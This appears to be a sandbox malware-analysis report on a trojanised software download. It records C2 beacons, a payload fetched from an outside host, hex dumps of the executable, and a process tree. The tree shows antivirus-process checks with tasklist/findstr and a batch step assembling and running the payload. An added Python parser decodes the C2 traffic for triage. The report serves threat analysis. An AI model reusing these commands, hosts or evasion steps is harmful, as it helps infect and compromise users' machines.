                                                                                                                                                                                                                                            2024-12-23 09:36:21 UTC230INData Raw: 65 30 0d 0a 32 6a 71 7a 50 6d 59 49 53 36 39 38 56 75 63 57 6c 6a 50 53 56 48 73 68 7a 58 68 53 4c 33 6c 4f 53 30 62 79 66 36 62 35 70 33 71 42 51 5a 46 4c 52 44 4a 70 78 77 67 69 6c 32 57 73 62 2f 30 49 56 45 71 68 45 53 4a 44 46 6a 77 69 4c 70 30 61 6c 74 66 55 45 72 56 4b 37 78 45 50 5a 6a 2f 77 48 7a 71 58 53 66 70 58 6f 41 73 4c 51 4b 4e 57 4a 6c 63 4e 62 47 64 6b 6c 41 75 45 77 35 56 57 2b 46 2b 52 42 46 64 31 5a 39 52 65 49 38 55 73 74 46 75 6d 49 41 74 53 39 79 52 39 63 31 59 39 4a 79 6d 47 43 4d 65 58 77 46 53 35 56 64 35 69 53 57 34 69 77 78 6b 4b 79 45 62 33 58 62 30 6d 47 6b 57 69 56 6a 64 58 48 47 78 6e 5a 4a 51 4c 68 4d 4f 58 56 76 68 66 6b 51 52 57 64 52 59 3d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: e02jqzPmYIS698VucWljPSVHshzXhSL3lOS0byf6b5p3qBQZFLRDJpxwgil2Wsb/0IVEqhESJDFjwiLp0altfUErVK7xEPZj/wHzqXSfpXoAsLQKNWJlcNbGdklAuEw5VW+F+RBFd1Z9ReI8UstFumIAtS9yR9c1Y9JymGCMeXwFS5Vd5iSW4iwxkKyEb3Xb0mGkWiVjdXHGxnZJQLhMOXVvhfkQRWdRY=
                                                                                                                                                                                                                                            2024-12-23 09:36:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0
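The two sessions above show the same identifier pair (hwid and lid) carried in two request shapes: a multipart upload (session 17, also carrying pid) that the server acknowledges with "ok <ip>", and a form-urlencoded act=get_message beacon (session 18) answered with a base64 blob, both delivered as chunked bodies. The following parser is an added example, not code from the Joe Sandbox report or from the malware; it reassembles the chunked bodies and extracts the beacon fields from either request shape so the exchanges can be correlated. The sample bytes are copied from the capture on this page; the closing multipart delimiter "--XMMU9DZE5L--" is assumed because the report truncates the upload body before it, and the decoded get_message blob is treated as opaque because the report does not document its format.

```python
"""Parse the C2 exchange recorded above (added example, not from the report or
the sample): a multipart POST carrying hwid/pid/lid, a form-urlencoded
act=get_message beacon, and the chunked responses to both."""
import base64
import re
from urllib.parse import parse_qs

# Sample bytes copied from the capture on this page. The closing delimiter
# "--XMMU9DZE5L--" is assumed: the report truncates the upload body before it.
MULTIPART_BODY = (
    b'--XMMU9DZE5L\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n'
    b"6E31A45A7B5F2CA1C8BA21E021A8AA6E\r\n"
    b'--XMMU9DZE5L\r\nContent-Disposition: form-data; name="pid"\r\n\r\n1\r\n'
    b'--XMMU9DZE5L\r\nContent-Disposition: form-data; name="lid"\r\n\r\nDvh8ui--888\r\n'
    b"--XMMU9DZE5L--\r\n"
)
GET_MESSAGE_BODY = b"act=get_message&ver=4.0&lid=Dvh8ui--888&j=&hwid=6E31A45A7B5F2CA1C8BA21E021A8AA6E"
# Chunked responses exactly as recorded: "<hex size>\r\n<data>\r\n0\r\n\r\n".
CHUNKED_OK = b"f\r\nok 8.46.123.189\r\n0\r\n\r\n"
CHUNKED_MSG = (
    b"e0\r\n"
    b"2jqzPmYIS698VucWljPSVHshzXhSL3lOS0byf6b5p3qBQZFLRDJpxwgil2Wsb/0IVEqhESJDFjwiLp0a"
    b"ltfUErVK7xEPZj/wHzqXSfpXoAsLQKNWJlcNbGdklAuEw5VW+F+RBFd1Z9ReI8UstFumIAtS9yR9c1Y9"
    b"JymGCMeXwFS5Vd5iSW4iwxkKyEb3Xb0mGkWiVjdXHGxnZJQLhMOXVvhfkQRWdRY=\r\n"
    b"0\r\n\r\n"
)


def decode_chunked(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: hex size line, data, CRLF, repeated
    until a zero-size chunk. Raises on a truncated or malformed chunk."""
    out = bytearray()
    pos = 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)  # drop any chunk extension
        if size == 0:
            return bytes(out)
        start = end + 2
        chunk = body[start:start + size]
        if len(chunk) != size or body[start + size:start + size + 2] != b"\r\n":
            raise ValueError("truncated or malformed chunk")
        out += chunk
        pos = start + size + 2


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Extract name -> value for simple form-data parts (no filenames needed here)."""
    fields = {}
    for part in body.split(b"--" + boundary)[1:]:
        if part.startswith(b"--"):
            break  # closing delimiter
        headers, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]+)"', headers)
        if m:
            fields[m.group(1).decode()] = value.rstrip(b"\r\n").decode()
    return fields


def parse_form(body: bytes) -> dict:
    """Flatten application/x-www-form-urlencoded, keeping empty values like j=."""
    return {k: v[0] for k, v in parse_qs(body.decode(), keep_blank_values=True).items()}


def parse_beacon(body: bytes) -> tuple:
    """Return (shape, fields) for either request body shape seen in the capture."""
    if body.startswith(b"--"):
        boundary = body[2:body.index(b"\r\n")]
        return "multipart", parse_multipart(body, boundary)
    return "urlencoded", parse_form(body)


def summarize(request_body: bytes, response_body: bytes) -> dict:
    """Pull the identifiers that tie the two requests together out of a
    request/response pair; {"match": False} when hwid and lid are absent."""
    shape, fields = parse_beacon(request_body)
    if not {"hwid", "lid"} <= fields.keys():
        return {"match": False}
    reply = decode_chunked(response_body)
    info = {"match": True, "shape": shape, "act": fields.get("act"),
            "hwid": fields["hwid"], "lid": fields["lid"]}
    ack = re.fullmatch(rb"ok (\d{1,3}(?:\.\d{1,3}){3})", reply)
    if ack:
        info["reply_ip"] = ack.group(1).decode()  # the IPv4 address in the "ok" reply
    else:
        # The get_message reply is base64; the report does not document what the
        # decoded bytes are, so only their length is recorded here.
        info["payload_len"] = len(base64.b64decode(reply, validate=True))
    return info


if __name__ == "__main__":
    print(summarize(MULTIPART_BODY, CHUNKED_OK))
    print(summarize(GET_MESSAGE_BODY, CHUNKED_MSG))
```

For triage, the useful correlation key is the hwid/lid pair: it is identical across the multipart upload and the get_message beacon even though the two requests differ in shape, and the "ok <ip>" acknowledgement distinguishes the upload from the beacon whose reply is only a base64 blob.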


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.16 | 49722 | 45.66.248.134 | 443 | 6148 | C:\Users\user\AppData\Local\Temp\650429\Palestine.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 09:36:24 UTC | 204 | OUT | GET /file/Panorado.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: slotwang.com
2024-12-23 09:36:24 UTC | 265 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.26.2
                                                                                                                                                                                                                                            Date: Mon, 23 Dec 2024 09:36:24 GMT
                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                            Content-Length: 18610385
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Last-Modified: Sun, 22 Dec 2024 20:02:20 GMT
                                                                                                                                                                                                                                            ETag: "11bf8d1-629e15b83ab00"
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-12-23 09:36:24 UTC16119INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                                                                            2024-12-23 09:36:24 UTC16384INData Raw: 00 fc 4a 40 00 0d 0a 54 54 79 70 65 54 61 62 6c 65 fc ff ff 7f ff ff ff 1f 00 11 40 00 01 00 00 00 00 02 00 00 20 4b 40 00 14 0a 50 54 79 70 65 54 61 62 6c 65 f8 4a 40 00 02 00 00 00 38 4b 40 00 14 10 50 50 61 63 6b 61 67 65 54 79 70 65 49 6e 66 6f 50 4b 40 00 02 00 54 4b 40 00 0e 10 54 50 61 63 6b 61 67 65 54 79 70 65 49 6e 66 6f 10 00 00 00 00 00 00 00 00 04 00 00 00 9c 10 40 00 00 00 00 00 02 09 54 79 70 65 43 6f 75 6e 74 02 00 1c 4b 40 00 04 00 00 00 02 09 54 79 70 65 54 61 62 6c 65 02 00 9c 10 40 00 08 00 00 00 02 09 55 6e 69 74 43 6f 75 6e 74 02 00 5c 2a 40 00 0c 00 00 00 02 09 55 6e 69 74 4e 61 6d 65 73 02 00 02 00 00 00 00 d0 4b 40 00 11 13 54 41 72 72 61 79 3c 53 79 73 74 65 6d 2e 42 79 74 65 3e 01 00 00 00 00 00 00 00 11 00 00 00 b4 10 40 00 06
                                                                                                                                                                                                                                            Data Ascii: J@TTypeTable@ K@PTypeTableJ@8K@PPackageTypeInfoPK@TK@TPackageTypeInfo@TypeCountK@TypeTable@UnitCount\*@UnitNamesK@TArray<System.Byte>@
                                                                                                                                                                                                                                            2024-12-23 09:36:24 UTC16384INData Raw: 89 1a 33 c0 5a 59 59 64 89 10 68 1b 8b 40 00 8b 45 fc 83 c0 18 e8 07 f9 ff ff 58 ff e0 e9 3b 05 00 00 eb eb 5e 5b 59 5d c3 53 8b d8 83 3d f8 d8 4a 00 00 75 07 b0 1a e8 71 e5 ff ff 8b c3 e8 e6 fd ff ff e8 05 00 00 00 5b c3 8d 40 00 53 8b d8 e8 94 c6 ff ff 3b 43 08 75 07 ff 43 04 b0 01 5b c3 83 3b 00 75 22 33 c0 ba 01 00 00 00 f0 0f b1 13 85 c0 75 13 e8 6f c6 ff ff 89 43 08 c7 43 04 01 00 00 00 b0 01 eb 02 33 c0 5b c3 90 55 8b ec 83 c4 e8 53 56 57 89 4d fc 8b da 8b f0 33 c0 89 45 e8 8b c3 e8 94 f9 ff ff 89 45 ec 8b 3d f8 d8 4a 00 ff 57 08 89 45 f0 33 c0 55 68 28 8c 40 00 64 ff 30 64 89 20 8b 43 04 89 45 f4 8d 55 e8 8b c6 e8 3f fe ff ff c7 43 04 01 00 00 00 8b c3 e8 59 fc ff ff 8b 3d f8 d8 4a 00 8b 4d fc 8b 55 f0 33 c0 ff 57 10 85 c0 0f 94 45 fb 8b c3 83 ca
                                                                                                                                                                                                                                            Data Ascii: 3ZYYdh@EX;^[Y]S=Juq[@S;CuC[;u"3uoCC3[USVWM3EE=JWE3Uh(@d0d CEU?CY=JMU3WE



Target ID: 1
Start time: 04:35:06
Start date: 23/12/2024
Path: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe"
Imagebase: 0x400000
File size: 829'879'991 bytes
MD5 hash: 2C83FB776A9E238D88E32393F17AE06A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 3
Start time: 04:35:06
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd
Imagebase: 0xf20000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 04:35:06
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6684c0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 04:35:08
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist
Imagebase: 0xd0000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 04:35:08
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /I "opssvc wrsa"
Imagebase: 0x610000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 04:35:08
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist
Imagebase: 0xd0000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 04:35:08
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase: 0x610000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
                                                                                                                                                                                                                                            Start time:04:35:09
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:cmd /c md 650429
                                                                                                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                                            Start time:04:35:09
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:findstr /V "GERMANY" False
                                                                                                                                                                                                                                            Imagebase:0x610000
                                                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                            Start time:04:35:09
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D
                                                                                                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                            Start time:04:35:09
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:Palestine.com D
                                                                                                                                                                                                                                            Imagebase:0xaf0000
                                                                                                                                                                                                                                            File size:947'288 bytes
                                                                                                                                                                                                                                            MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                            Start time:04:35:09
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:choice /d y /t 5
                                                                                                                                                                                                                                            Imagebase:0xfd0000
                                                                                                                                                                                                                                            File size:28'160 bytes
                                                                                                                                                                                                                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                            Start time:04:35:25
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                            Imagebase:0x7ff6822e0000
                                                                                                                                                                                                                                            File size:71'680 bytes
                                                                                                                                                                                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                            Start time:04:35:40
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe"
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            File size:829'879'991 bytes
                                                                                                                                                                                                                                            MD5 hash:2C83FB776A9E238D88E32393F17AE06A
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                            Start time:04:35:40
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd
                                                                                                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                            Start time:04:35:40
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                            Start time:04:35:42
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                                                            Imagebase:0xd0000
                                                                                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                            Start time:04:35:42
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                            Imagebase:0x610000
                                                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                            Start time:04:35:42
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                                                            Imagebase:0xd0000
                                                                                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                            Start time:04:35:42
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                            Imagebase:0x610000
                                                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                            Start time:04:35:43
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:cmd /c md 650429
                                                                                                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                            Start time:04:35:43
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:cmd /c copy /b ..\Murray + ..\Indication + ..\Institution + ..\Metres + ..\Display + ..\Cr + ..\Programming D
                                                                                                                                                                                                                                            Imagebase:0xf20000
                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                            Start time:04:35:43
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\650429\Palestine.com
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:Palestine.com D
                                                                                                                                                                                                                                            Imagebase:0xaf0000
                                                                                                                                                                                                                                            File size:947'288 bytes
                                                                                                                                                                                                                                            MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                            Start time:04:35:43
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:choice /d y /t 5
                                                                                                                                                                                                                                            Imagebase:0xfd0000
                                                                                                                                                                                                                                            File size:28'160 bytes
                                                                                                                                                                                                                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                            Start time:04:35:50
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
